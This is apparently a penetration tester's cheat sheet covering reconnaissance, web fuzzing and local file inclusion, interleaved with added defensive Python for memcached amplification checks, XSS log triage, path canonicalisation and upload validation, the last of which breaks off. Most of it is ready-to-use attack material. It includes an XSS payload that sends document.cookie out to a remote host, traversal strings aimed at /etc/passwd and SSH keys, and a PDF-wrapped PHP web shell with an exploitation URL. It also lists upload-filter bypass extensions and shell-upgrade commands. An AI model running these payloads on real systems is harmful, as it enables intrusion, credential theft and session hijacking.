sudo net time set -S <RHOST>
sudo net time \\<RHOST> /set /y
sudo ntpdate <RHOST>
sudo ntpdate -s <RHOST>
sudo ntpdate -b -u <RHOST>
sudo timedatectl set-timezone UTC
sudo timedatectl list-timezones
sudo timedatectl set-timezone '<COUNTRY>/<CITY>'
sudo timedatectl set-time 15:58:30
sudo timedatectl set-time '2015-11-20 16:14:50'
sudo timedatectl set-local-rtc 1

Keep in sync with the server
while [ 1 ]; do sudo ntpdate <RHOST>;done

Shortcuts (tmux)

ctrl b + w    # show windows
ctrl + "    # split window horizontally
ctrl + %    # split window vertically
ctrl + ,    # rename window
ctrl + {    # flip window
ctrl + }    # flip window
ctrl + spacebar    # toggle pane layout

Copy and paste

:setw -g mode-keys vi
ctrl b + [
space
enter
ctrl b + ]

Search

ctrl b + [    # enter copy mode
ctrl + /    # search within copy mode (vi keys)
n    # next match
shift + n    # search backwards

Logging

ctrl b
shift + P    # start / stop

Save output

ctrl b + :
capture-pane -S -
ctrl b + :
save-buffer <FILE>.txt

Upgrade the shell

python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl + z
stty raw -echo
fg
Enter
Enter
export TERM=xterm

Or:

script -q /dev/null -c bash
/usr/bin/script -qc /bin/bash /dev/null

Switch to a fully interactive shell

stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

Fix a tunnelled shell

env reset

Or

stty onlcr

VirtualBox - fix the shell environment (clipboard)

sudo pkill VBoxClient && VBoxClient --clipboard

virtualenv - activate a virtual environment

sudo apt-get install virtualenv
virtualenv -p python2.7 venv
. venv/bin/activate

python.exe -m pip install virtualenv
python.exe -m virtualenv venv
venv\Scripts\activate

Reconnaissance

Memcached

Tool: https://github.com/pd4d10/memcached-cli

memcrashed / 11211/UDP

npm install -g memcached-cli
memcached-cli <USERNAME>:<PASSWORD>@<RHOST>:11211
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211

STAT pid 21357
STAT uptime 41557034
STAT time 1519734962

sudo nmap <RHOST> -p 11211 -sU -sS --script memcached-info

stats items
stats cachedump 1 0
get link
get file
get user
get passwd
get account
get username
get password
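The echo -en line above sends a memcached UDP frame: an 8-byte header (request ID, sequence number, number of datagrams, reserved, all big-endian 16-bit) followed by the ASCII command. The following Python is an added example (not from the original cheat sheet or from memcached-cli) that builds and parses that frame and computes the response-to-request size ratio that makes an Internet-exposed 11211/UDP an amplification risk. The response datagram is constructed from the STAT lines shown above.

```python
import struct

# Memcached UDP frame header: request ID, sequence number, total datagrams,
# reserved (all big-endian 16-bit), followed by the plain ASCII protocol command.
_HDR = struct.Struct("!HHHH")


def build_udp_frame(command: bytes, request_id: int = 0) -> bytes:
    """Single-datagram request frame, the same layout as the echo -en line above."""
    return _HDR.pack(request_id, 0, 1, 0) + command


def parse_udp_frame(datagram: bytes) -> dict:
    """Split a datagram into header fields and payload; reject anything that
    does not look like a memcached frame (reserved must be 0, seq < total)."""
    if len(datagram) < _HDR.size:
        raise ValueError("datagram shorter than the 8-byte header")
    request_id, seq, total, reserved = _HDR.unpack_from(datagram)
    if reserved != 0 or total == 0 or seq >= total:
        raise ValueError("not a memcached UDP frame")
    return {"request_id": request_id, "seq": seq, "total": total,
            "payload": datagram[_HDR.size:]}


def parse_stats(payload: bytes) -> dict:
    """Parse 'STAT <name> <value>' lines up to END into a dict of strings."""
    stats = {}
    for line in payload.decode("ascii", "replace").split("\r\n"):
        if line == "END":
            break
        if line.startswith("STAT "):
            _, name, value = line.split(" ", 2)
            stats[name] = value
    return stats


def amplification_factor(request: bytes, response_datagrams: list) -> float:
    """Bytes returned per byte sent: the reason an Internet-exposed 11211/UDP
    gets abused for reflection attacks, and why UDP should be disabled (-U 0)."""
    return sum(len(d) for d in response_datagrams) / len(request)


# Constructed response datagram: the three STAT lines shown above wrapped in a
# single-datagram frame (not a real capture).
SAMPLE_REQUEST = build_udp_frame(b"stats\r\n")
SAMPLE_RESPONSE = _HDR.pack(0, 0, 1, 0) + (
    b"STAT pid 21357\r\nSTAT uptime 41557034\r\nSTAT time 1519734962\r\nEND\r\n"
)
```

Even this three-line stats reply is almost five times the size of the request; a full stats or a large cached value answers a 15-byte probe with kilobytes, which is the memcrashed pattern. The fix on the server side is to bind memcached to localhost or an internal interface and start it with UDP disabled (-U 0).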

NetBIOS: ports 137 to 139

nbtscan <RHOST>
nmblookup -A <RHOST>

nmap port scanning

sudo nmap -A -T4 -sC -sV -p- <RHOST>
sudo nmap -sV -sU <RHOST>
sudo nmap -A -T4 -sC -sV --script vuln <RHOST>
sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery <RHOST>
sudo nmap -sC -sV -p- --scan-delay 5s <RHOST>
sudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' <RHOST>
ls -lh /usr/share/nmap/scripts/*ssh*
locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb

Port scanning

for p in {1..65535}; do nc -vn <RHOST> $p -w 1 -z & done 2> <FILE>.txt

export ip=<RHOST>; for port in $(seq 1 65535); do timeout 0.01 bash -c "</dev/tcp/$ip/$port && echo The port $port is open || echo The Port $port is closed > /dev/null" 2>/dev/null || echo Connection Timeout > /dev/null; done

snmpwalk

snmpwalk -c public -v1 <RHOST>    # walk the whole tree with community string public (SNMPv1)
snmpwalk -v2c -c public <RHOST> 1.3.6.1.2.1.4.34.1.3    # ipAddressIfIndex: IP addresses and their interfaces
snmpwalk -v2c -c public <RHOST> .1
snmpwalk -v2c -c public <RHOST> nsExtendObjects    # NET-SNMP extend objects (configured external commands)
snmpwalk -c public -v1 <RHOST> 1.3.6.1.4.1.77.1.2.25    # Windows user accounts
snmpwalk -c public -v1 <RHOST> 1.3.6.1.2.1.25.4.2.1.2    # running processes (hrSWRunName)
snmpwalk -c public -v1 <RHOST> .1.3.6.1.2.1.1.5    # system name (sysName)
snmpwalk -c public -v1 <RHOST> 1.3.6.1.4.1.77.1.2.3.1.1    # Windows services
snmpwalk -c public -v1 <RHOST> 1.3.6.1.4.1.77.1.2.27    # Windows shares
snmpwalk -c public -v1 <RHOST> 1.3.6.1.2.1.6.13.1.3    # local TCP ports (tcpConnLocalPort)
snmpwalk -c public -v1 <RHOST> 1.3.6.1.2.1.25.6.3.1.2    # installed software (hrSWInstalledName)

Web application analysis

Burp Suite

Ctrl+r    // send request to Repeater
Ctrl+i    // send request to Intruder
Ctrl+Shift+b    // Base64 encode
Ctrl+Shift+u    // URL decode

Set proxy environment variables

export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=https://localhost:8080

cadaver: interact with a WebDAV server

cadaver http://<RHOST>/<WEBDAV_DIRECTORY>/

dav:/<WEBDAV_DIRECTORY>/> cd C
dav:/<WEBDAV_DIRECTORY>/C/> ls
dav:/<WEBDAV_DIRECTORY>/C/> put <FILE>

Cross-site scripting (XSS)

<sCrIpt>alert(1)</ScRipt>
<script>alert('XSS');</script>
<script>alert(document.cookie)</script>
<script>document.querySelector('#foobar-title').textContent = '<TEXT>'</script>
<script>fetch('https://<RHOST>/steal?cookie=' + btoa(document.cookie));</script>
<script>user.changeEmail('user@domain');</script>
<iframe src=file:///etc/passwd height=1000px width=1000px></iframe>
<img src='http://<RHOST>'/>
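The payloads above vary case (<sCrIpt>), arrive URL-encoded (sometimes twice) and rely on the browser tolerating odd markup, so a detection rule has to decode first and match case-insensitively; the server-side fix is output encoding, not filtering. The following Python is an added example (not from the original cheat sheet) that triages query strings from constructed access-log entries and shows how html.escape renders the same payloads inert.

```python
import html
import re
import urllib.parse

# Constructed query strings of the kind found in a web server access log;
# none of them is a real capture. The encoded ones mirror the payloads above.
SAMPLE_QUERIES = [
    "q=hello+world",
    "q=%3CsCrIpt%3Ealert(1)%3C%2FScRipt%3E",
    "name=%3Cimg%20src%3D%27http%3A%2F%2Fattacker.example%2F%27%2F%3E",
    "msg=%3Ciframe%20src%3Dfile%3A%2F%2F%2Fetc%2Fpasswd%3E%3C%2Fiframe%3E",
    "comment=%253Cscript%253Efetch(%27http%3A%2F%2Fattacker.example%2Fsteal%27)%253C%2Fscript%253E",
]

# Tag names, inline event handlers and javascript: URLs, matched case-insensitively.
_XSS = re.compile(
    r"<\s*/?\s*(script|iframe|img|svg|object|embed)\b|\bon[a-z]+\s*=|javascript\s*:",
    re.IGNORECASE,
)


def decode_value(raw: str) -> str:
    """Undo up to three layers of percent-encoding, then HTML entities, so that
    %253Cscript%253E and &lt;script&gt; are both inspected as '<script>'."""
    value = raw
    for _ in range(3):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return html.unescape(value)


def looks_like_xss(value: str) -> bool:
    return _XSS.search(decode_value(value)) is not None


def flag_query(query: str) -> list:
    """Names of the parameters in a query string whose value looks like script injection."""
    return [name for name, value in urllib.parse.parse_qsl(query, keep_blank_values=True)
            if looks_like_xss(value)]


def render_safely(value: str) -> str:
    """Output encoding for an HTML text context, the actual fix: after escaping,
    the payloads above are displayed as text instead of being parsed as markup."""
    return html.escape(decode_value(value), quote=True)


def triage(queries=SAMPLE_QUERIES) -> dict:
    """Map each sample query to the parameter names flagged in it."""
    return {q: flag_query(q) for q in queries}
```

The regex is deliberately loose (it will also flag a harmless "<img" in a forum post), which is fine for a log-triage rule but not for an input filter; the cookie-theft payload is additionally blunted by marking session cookies HttpOnly, since document.cookie then cannot read them.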

ffuf

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ --fs <NUMBER> -mc all
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ --fw <NUMBER> -mc all
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ -mc 200,204,301,302,307,401 -o results.txt
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<RHOST>/ -H "Host: FUZZ.<RHOST>" -fs 185
ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://<RHOST>/backups/backup_2020070416FUZZ.zip

API endpoint fuzzing
ffuf -u https://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412

Searching for LFI (local file inclusion)
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349

Fuzzing with a PHP session ID
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u "http://<RHOST>/admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644

Recursive directory scan
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/basic/FUZZ -recursion

Scan with a fixed file extension
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/ext/logs/FUZZ -e .log

Rate limiting
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http://<RHOST>/cd/rate/FUZZ -mc 200,429

Virtual host / subdomain scan
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -fs 1495

Bulk file extension discovery
ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://<RHOST>/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip

GitTools

# download: https://github.com/internetwache/GitTools
./gitdumper.sh http://<RHOST>/.git/ /PATH/TO/FOLDER
./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/

Gobuster

-e    // expanded mode, print full URLs
-k    // skip SSL certificate verification
-r    // follow redirects
-s    // status codes to include
-b    // status codes to exclude
-k    // ignore certificate
--wildcard    // set the wildcard option

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>/ -x php

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<RHOST>/ -x php,txt,html,js -e -s 200

$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://<RHOST>:<RPORT>/ -b 200 -k --wildcard

Common file extensions
txt,bak,php,html,js,asp,aspx

Common image extensions
png,jpg,jpeg,gif,bmp

Directory scan
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://<RHOST>/api/ -e -s 200

DNS scan
gobuster dns -d <RHOST> -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster dns -d <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Virtual host / subdomain discovery
gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

Specify a user agent
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/ -a Linux

Local file inclusion (LFI)

http://<RHOST>/<FILE>.php?file=
http://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd
http://<RHOST>/<FILE>.php?file=../../../../../../../../../../etc/passwd

Vulnerable up to PHP 5.3
http://<RHOST>/<FILE>.php?file=../../../../../../../../../../etc/passwd%00

Null bytes
%00
0x00

Encoded traversal strings
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\

php://filter wrapper

Reference: https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb
Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phpfilter

url=php://filter/convert.base64-encode/resource=file:////var/www/<RHOST>/api.php

http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
base64 -d <FILE>.php

Header values for Django, Rails or Node.js web applications
Accept: ../../../../.././../../../../etc/passwd{{
Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A
Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{
Accept: ../../../../.././../../../../etc/passwd{%0A{{
Accept: ../../../../.././../../../../etc/passwd{%00{{
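Every entry in the encoded traversal list above, the %00 suffix, the CR/LF tricks in the header values and the php:// wrapper defeat a check that inspects the raw parameter. The following Python is an added example (not from the original cheat sheet) that canonicalises a file parameter the way a server-side check should, by repeated percent-decoding, folding overlong UTF-8 and IIS-style %u escapes, mapping full-width look-alikes and normalising separators, and only then classifies it. The sample values are constructed from the lists above.

```python
import re
import unicodedata

_PCT = re.compile(r"%([0-9a-fA-F]{2})")
_PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")
# Overlong UTF-8 sequences for '.', '/' and '\' that a lenient decoder accepts.
_OVERLONG = {"\xc0\xae": ".", "\xc0\xaf": "/", "\xc1\x9c": "\\"}
# Unicode look-alikes that NFKC does not fold: division slash and set minus.
_LOOKALIKES = {0x2215: "/", 0x2216: "\\"}

# Constructed samples built from the encoded traversal list above, plus benign values.
SUSPECT_SAMPLES = [
    "../../etc/passwd",
    "..\\..\\windows\\win.ini",
    "%2e%2e%2fetc%2fpasswd",
    "%252e%252e%252fetc%252fpasswd",
    "%c0%ae%c0%ae%c0%afetc%c0%afpasswd",
    "%uff0e%uff0e%u2215etc%u2215passwd",
    "..././..././etc/passwd",
    "...\\.\\...\\.\\boot.ini",
    "../../etc/passwd%00.png",
    "php://filter/convert.base64-encode/resource=index",
]
BENIGN_SAMPLES = ["images/logo.png", "reports/2023/q1.pdf"]


def canonicalize(raw: str) -> str:
    """Reduce a file parameter to the form the file system would see."""
    value = raw
    for _ in range(3):  # %252e -> %2e -> .  (double encoding)
        decoded = _PCT.sub(lambda m: chr(int(m.group(1), 16)), value)
        if decoded == value:
            break
        value = decoded
    for overlong, plain in _OVERLONG.items():
        value = value.replace(overlong, plain)
    value = _PCT_U.sub(lambda m: chr(int(m.group(1), 16)), value)  # IIS-style %uXXXX
    value = value.translate(_LOOKALIKES)
    value = unicodedata.normalize("NFKC", value)  # full-width U+FF0E -> '.'
    return value.replace("\\", "/")


def suspicious_reasons(raw: str) -> list:
    """Why a value should be rejected; an empty list means it looks like a plain relative path."""
    canon = canonicalize(raw)
    reasons = []
    if re.match(r"[A-Za-z][A-Za-z0-9+.-]*:", canon):
        reasons.append("scheme or drive prefix")   # php://, file://, C:
    if re.search(r"[\x00-\x1f\x7f]", canon):
        reasons.append("control or null byte")     # %00 truncation, %0D/%0A
    if canon.startswith("/"):
        reasons.append("absolute path")
    if re.search(r"(^|/)\.{2,}(/|$)", canon):
        reasons.append("dot-dot segment")          # ../ and the filter-evading ..../
    return reasons


def is_suspicious(raw: str) -> bool:
    return bool(suspicious_reasons(raw))


def audit(values) -> dict:
    return {v: suspicious_reasons(v) for v in values}
```

Rejecting anything with a reason is the validation step; the real protection is to resolve the final path (realpath) and confirm it still lies under the intended base directory, because a denylist of encodings will always lag behind the next trick. The same canonicalize() applied to request logs turns the encoded variants above into the readable "../etc/passwd" for alerting.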
Linux files

/etc/passwd
/etc/shadow
/etc/aliases
/etc/anacrontab
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/at.allow
/etc/at.deny
/etc/bashrc
/etc/bootptab
/etc/chrootUsers
/etc/chttp.conf
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/cups/cupsd.conf
/etc/exports
/etc/fstab
/etc/ftpaccess
/etc/ftpchroot
/etc/ftphosts
/etc/groups
/etc/grub.conf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/httpd/access.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/httpd/srm.conf
/etc/inetd.conf
/etc/inittab
/etc/issue
/etc/knockd.conf
/etc/lighttpd.conf
/etc/lilo.conf
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/lsb-release
/etc/motd
/etc/modules.conf
/etc/mtab
/etc/my.cnf
/etc/my.conf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/npasswd
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/printcap
/etc/profile
/etc/proftp.conf
/etc/proftpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/putreftpd.pdb
/etc/redhat-release
/etc/resolv.conf
/etc/samba/smb.conf
/etc/snmpd.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/sysconfig/network
/etc/syslog.conf
/etc/termcap
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/pure-ftpd.log
/logs/security_debug_log
/logs/security_log
/opt/lampp/etc/httpd.conf
/opt/xampp/etc/php.ini
/proc/cmdline
/proc/cpuinfo
/proc/filesystems
/proc/interrupts
/proc/ioports
/proc/meminfo
/proc/modules
/proc/mounts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/<PID>/cmdline
/proc/<PID>/maps
/proc/sched_debug
/proc/self/cwd/app.py
/proc/self/environ
/proc/self/net/arp
/proc/stat
/proc/swaps
/proc/version
/root/anaconda-ks.cfg
/usr/etc/pure-ftpd.conf
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/modsec.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/audit_log
/usr/local/apache/error_log
/usr/local/apache/error.log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log
/usr/local/Zend/etc/php.ini
/usr/sbin/pure-config.pl
/var/adm/log/xferlog
/var/apache2/config.inc
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/php.ini
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth.log
/var/log/boot
/var/htmp
/var/log/chttp.log
/var/log/cups/error.log
/var/log/daemon.log
/var/log/debug
/var/log/dmesg
/var/log/dpkg.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim.paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/faillog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
/var/log/lighttpd/lighttpd.access.log
/var/log/lighttpd/lighttpd.error.log
/var/log/mail.info
/var/log/mail.log
/var/log/maillog
/var/log/mail.warn
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/proftpd
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/secure
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/mysql.log
/var/run/utmp
/var/spool/cron/crontabs/root
/var/webmin/miniserv.log
/var/www/html<VHOST>/__init__.py
/var/www/html/db_connect.php
/var/www/html/utils.php
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access_log
/var/www/logs/error_log
/var/www/logs/access.log
/var/www/logs/error.log
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh/authorized_keys
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession
Windows files
C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system
C:/Windows/repair/software
C:/Windows/repair/security
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log

PDF PHP Inclusion

Create a file with a PDF header that contains PHP code.

%PDF-1.4

<?php
system($_GET["cmd"]);
?>

Exploitation example:

http://<RHOST>/index.php?page=uploads/<FILE>.pdf%00&cmd=whoami

PHP Upload Filter Bypass

.sh
.cgi
.inc
.txt
.pht
.phtml
.phP
.Php
.php3
.php4
.php5
.php7
.pht
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.jpeg
<FILE>.php%20
<FILE>.php%0d%0a.jpg
<FILE>.php%0a
<FILE>.php.jpg
<FILE>.php%00.gif
<FILE>.php\x00.gif
<FILE>.php%00.png
<FILE>.php\x00.png
<FILE>.php%00.jpg
<FILE>.php\x00.jpg
mv <FILE>.jpg <FILE>.php\x00.jpg
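
The kind of extension check the variants above get past, next to a hardened replacement, added here as an example and not code from the original notes: the hardened version decodes the submitted name first, rejects any control character (the %00, %0a and %0d%0a cases) instead of truncating at it, lowercases, and judges every dotted segment against the interpreter extensions listed above rather than only the last one. The executable-segment set is built from that list; the allowlist of image and document extensions is an assumption for the example.

```python
from typing import Tuple
from urllib.parse import unquote

# Interpreter extensions from the list above: any of them appearing as any
# dotted segment of the name (not only the last) is grounds for rejection.
EXECUTABLE_SEGMENTS = {
    "php", "php3", "php4", "php5", "php7", "phps", "phpt", "phar",
    "pht", "phtm", "phtml", "pgif", "inc", "cgi", "sh",
}
# Assumed allowlist for this example; an upload handler should accept only
# the final extensions it actually needs.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}


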